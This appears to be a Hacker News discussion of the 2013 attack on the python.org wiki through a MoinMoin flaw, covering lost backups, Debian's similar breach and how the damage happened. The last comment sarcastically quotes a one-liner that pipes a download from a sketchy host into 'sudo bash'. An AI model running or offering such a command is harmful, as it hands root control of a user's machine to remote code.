
Python.org Wiki has been Attacked - lispython
http://wiki.python.org/moin/WikiAttack2013/
======
lifeisstillgood
I know that we expect our volunteer Open Source Language leaders to be
exemplars of best practise and always on the ball, but there is never enough
volunteers or enough funds to pay for all the sysadmins you need.

But my first reaction here is "There, but for the grace of God, go I"

Embarrassing yes. End of the world, no. Heads to roll ? No, but arse to be
kicked yes. Won't happen again will it.

------
Tinned_Tuna
> our most recent backup dates back to June 24 2012

And therein lies the problem of disaster recovery. Even if you have a
catastrophic bug, you should not be losing 6 months of data.

~~~
yk
They state that the attack possibly occurred the next day, so it is possible
that the attacker did disable backups.

~~~
eksith
This is why write-only backups aren't just a good idea; like gravity, it's the
law. I know funding for these things are on a shoestring budget, but there
should have been an external service to ensure backups are being made on a
regular basis. Or else, you don't know something's wrong until something's
really, really wrong.

------
orangethirty
I might have some data gotten through crawling them with Nuuton. Anyone from
their team here? I'm going to check. Though not very positive, because I'm not
currently scrapping ever single page completely.

 _Bad news update:_

I had not covered the wiki yet. The crawler seems to have ventured off to SO
(the crawler runs 24/7 by itself). I'm so sorry. :(

~~~
eqreqeq
Not to sound rude but what are you talking about? Why are you even
apologizing?

~~~
lylejohnson
I think he's saying that he set up a web crawler to scrape python.org, and he
was hoping that in the process it had made copies of those Wiki pages. He's
apologizing that, as it turns out, the crawler did not make it to those pages
after all.

~~~
orangethirty
Exactly. I thought my crawler had covered all of python.org, but it strayed
off to stack overflow. Had not noticed due to the sheer amount of data it goes
through. On one side, this sucks because I cannot help put the wiki back
online. One the other, this led me to discover this bug.

~~~
dbecker
I'd expect they'll find a way to restore the wiki content. The bigger concern
is that someone downloaded their password file.

------
larelli
Couldn't someone at Google provide a dump of the wiki. Assuming that they have
it in their page cache they might be willing to help, given they seem to be
one of the largest organizations using Python.

~~~
dalke
From the article. "It turned out that the Google cache was unusable for the
task due to a surge protection on their site."

~~~
jzwinck
Right, but some of us thought that meant the Python folks couldn't use it
because Google's servers were limiting the rate of GET requests for the cached
pages. I.e. the data is inside Google but difficult to get out quickly
(without Google's specific help).

~~~
dalke
Ahh, yes. Your interpretation makes more sense than mine.

------
Skoofoo
What compels someone to destroy documentation for an open source project?

~~~
crusso
Alfred Pennyworth: Well, because he thought it was good sport. Because some
men aren't looking for anything logical, like money. They can't be bought,
bullied, reasoned, or negotiated with. Some men just want to watch the world
burn.

------
daGrevis
No backups since June 24, 2012?!

~~~
quink
Just as disturbing: "The attack used on the wiki was apparently the same as
the one which hit Debian" [on 2012-07-25]

The exploit was out there and had been used to hit debian.org in a big way,
and had been fixed. But python.org didn't update MoinMoin or check whether
their MoinMoin installation hadn't been compromised until their data got
deleted about half a year after the original exploit :|

~~~
jyap
No, not really.

Debian Timeline

2012-07-25: Debian's MoinMoin was exploited (due to what is eventually called
CVE-2012-6081).

2012-10-18: First use of the backdoor.

2012-10-28: Theft of email addresses, password hashes and reCAPTCHA key.

2012-11-09: Last use of the backdoor.

2012-12-28: We are informed about a potential security issue in MoinMoin by
the friendly people at dyne.org.

From: <http://wiki.debian.org/DebianWiki/SecurityIncident2012>

~~~
tonfa
And many other people have been affected (probably everyone decent sized site
running MoinMoin): MoinMoin itself, Mercurial, also I think FreeDesktop. I
wonder if Ubuntu was too.

------
fixed_input
"We were subsequently approached by the person who ran the rm -r * " ... " It
is also obvious that the people who installed the plugin, had different
intentions than causing easy to detect damage on the system."

Seems like a case of a script kiddie who got the login information from
someone else...probably doesn't know his way around Linux too well and thought
it would be funny to run a few commands, then got scared once he realized what
he'd done and fessed up

------
pekk
Given that this is the same attack of Jan 5, about which we have already seen
posts, and has not indicated a bug in anything except MoinMoin and PSF's
systems administration staff, I wonder why this is being posted again today,
with a headline which could easily be taken to suggest a fresh attack.

------
dbecker
When this happens on sites run by tech-savvy folks, it makes me wonder: How
frequently is this happening (and going undetected) on sites with less savvy
admins?

------
Buttons840
This reminds me when divmod.org was attacked. The site has been "temporarily"
offline for years now. It's really sad because divmod had some quality Python
libraries which have never become popular because they have no documentation;
the documentation was destroyed when the site was attacked.

------
benedikt
> The VM was rebooted on Jan 7, apparently in an attempt to get things working
> again.

Who rebooted the VM? If it was the attackers, this implies that they had root.
But the post only states that they could execute code as the moin user.

------
biot
And the article links to the wiki... if it's been compromised, how should I
know it's now safe to visit?

------
jvehent
Oh Darn ! So that wiki page saying that I should run `curl
<http://sketchyhackers.cc/exploit> | sudo bash` wasn't legit ???

</sarcasm>

